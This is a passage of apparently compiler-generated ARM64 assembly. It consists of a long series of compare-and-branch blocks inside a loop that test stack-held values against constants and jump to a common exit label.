ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_533
LBB1_533: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #496] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_537
b LBB1_534
LBB1_534: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_537
b LBB1_535
LBB1_535: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_537
b LBB1_536
LBB1_536: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_537
LBB1_537: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #496] ; 8-byte Folded Reload
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_542
b LBB1_538
LBB1_538: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_541
b LBB1_539
LBB1_539: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_541
b LBB1_540
LBB1_540: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_542
b LBB1_541
LBB1_541: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #16
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_542
LBB1_542: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_545
b LBB1_543
LBB1_543: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #16
cset w8, ne
tbnz w8, #0, LBB1_545
b LBB1_544
LBB1_544: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #496] ; 8-byte Folded Reload
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_545
LBB1_545: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_549
b LBB1_546
LBB1_546: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #496] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_549
b LBB1_547
LBB1_547: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #16
cset w8, ne
tbnz w8, #0, LBB1_549
b LBB1_548
LBB1_548: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-176] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_549
LBB1_549: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-128] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_551
b LBB1_550
LBB1_550: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-168] ; 8-byte Folded Reload
ldr x8, [sp, #504] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_553
b LBB1_551
LBB1_551: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #536] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_553
b LBB1_552
LBB1_552: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_553
LBB1_553: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #536] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_555
b LBB1_554
LBB1_554: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_556
b LBB1_555
LBB1_555: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #504] ; 8-byte Folded Reload
ldur x8, [x29, #-168] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_556
LBB1_556: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_558
b LBB1_557
LBB1_557: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #552] ; 8-byte Folded Reload
ldur x8, [x29, #-128] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_558
LBB1_558: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #536] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_561
b LBB1_559
LBB1_559: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_561
b LBB1_560
LBB1_560: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-128] ; 8-byte Folded Reload
ldur x8, [x29, #-168] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_561
LBB1_561: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #536] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_565
b LBB1_562
LBB1_562: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_565
b LBB1_563
LBB1_563: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_565
b LBB1_564
LBB1_564: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_565
LBB1_565: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #536] ; 8-byte Folded Reload
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_570
b LBB1_566
LBB1_566: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_569
b LBB1_567
LBB1_567: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_569
b LBB1_568
LBB1_568: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_570
b LBB1_569
LBB1_569: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #17
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_570
LBB1_570: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_573
b LBB1_571
LBB1_571: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #17
cset w8, ne
tbnz w8, #0, LBB1_573
b LBB1_572
LBB1_572: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #536] ; 8-byte Folded Reload
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_573
LBB1_573: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_577
b LBB1_574
LBB1_574: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #536] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_577
b LBB1_575
LBB1_575: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #17
cset w8, ne
tbnz w8, #0, LBB1_577
b LBB1_576
LBB1_576: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-144] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_577
LBB1_577: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-120] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_579
b LBB1_578
LBB1_578: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-136] ; 8-byte Folded Reload
ldr x8, [sp, #544] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_581
b LBB1_579
LBB1_579: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #280] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_581
b LBB1_580
LBB1_580: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_581
LBB1_581: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #280] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_583
b LBB1_582
LBB1_582: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_584
b LBB1_583
LBB1_583: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #544] ; 8-byte Folded Reload
ldur x8, [x29, #-136] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_584
LBB1_584: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_586
b LBB1_585
LBB1_585: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #560] ; 8-byte Folded Reload
ldur x8, [x29, #-120] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_586
LBB1_586: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #280] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_589
b LBB1_587
LBB1_587: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_589
b LBB1_588
LBB1_588: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-120] ; 8-byte Folded Reload
ldur x8, [x29, #-136] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_589
LBB1_589: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #280] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_593
b LBB1_590
LBB1_590: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_593
b LBB1_591
LBB1_591: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_593
b LBB1_592
LBB1_592: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_593
LBB1_593: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #280] ; 8-byte Folded Reload
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_598
b LBB1_594
LBB1_594: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_597
b LBB1_595
LBB1_595: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_597
b LBB1_596
LBB1_596: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_598
b LBB1_597
LBB1_597: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #18
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_598
LBB1_598: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_601
b LBB1_599
LBB1_599: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #18
cset w8, ne
tbnz w8, #0, LBB1_601
b LBB1_600
LBB1_600: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #280] ; 8-byte Folded Reload
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_601
LBB1_601: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_605
b LBB1_602
LBB1_602: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #280] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_605
b LBB1_603
LBB1_603: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #18
cset w8, ne
tbnz w8, #0, LBB1_605
b LBB1_604
LBB1_604: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #824] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_605
LBB1_605: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #600] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_607
b LBB1_606
LBB1_606: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #608] ; 8-byte Folded Reload
ldr x8, [sp, #72] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_609
b LBB1_607
LBB1_607: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #320] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_609
b LBB1_608
LBB1_608: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_609
LBB1_609: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #320] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_611
b LBB1_610
LBB1_610: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_612
b LBB1_611
LBB1_611: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #72] ; 8-byte Folded Reload
ldr x8, [sp, #608] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_612
LBB1_612: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_614
b LBB1_613
LBB1_613: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #64] ; 8-byte Folded Reload
ldr x8, [sp, #600] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_614
LBB1_614: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #320] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_617
b LBB1_615
LBB1_615: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_617
b LBB1_616
LBB1_616: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #600] ; 8-byte Folded Reload
ldr x8, [sp, #608] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_617
LBB1_617: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #320] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_621
b LBB1_618
LBB1_618: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_621
b LBB1_619
LBB1_619: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_621
b LBB1_620
LBB1_620: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_621
LBB1_621: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #320] ; 8-byte Folded Reload
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_626
b LBB1_622
LBB1_622: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_625
b LBB1_623
LBB1_623: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_625
b LBB1_624
LBB1_624: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_626
b LBB1_625
LBB1_625: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #19
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_626
LBB1_626: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_629
b LBB1_627
LBB1_627: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #19
cset w8, ne
tbnz w8, #0, LBB1_629
b LBB1_628
LBB1_628: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #320] ; 8-byte Folded Reload
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_629
LBB1_629: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_633
b LBB1_630
LBB1_630: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #320] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_633
b LBB1_631
LBB1_631: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #19
cset w8, ne
tbnz w8, #0, LBB1_633
b LBB1_632
LBB1_632: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #864] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_633
LBB1_633: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #584] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_635
b LBB1_634
LBB1_634: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #592] ; 8-byte Folded Reload
ldr x8, [sp, #56] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_637
b LBB1_635
LBB1_635: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #360] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_637
b LBB1_636
LBB1_636: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_637
LBB1_637: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #360] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_639
b LBB1_638
LBB1_638: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #904] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_640
b LBB1_639
LBB1_639: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #56] ; 8-byte Folded Reload
ldr x8, [sp, #592] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_640
LBB1_640: ; in Loop: Header=BB1_70 Depth=1
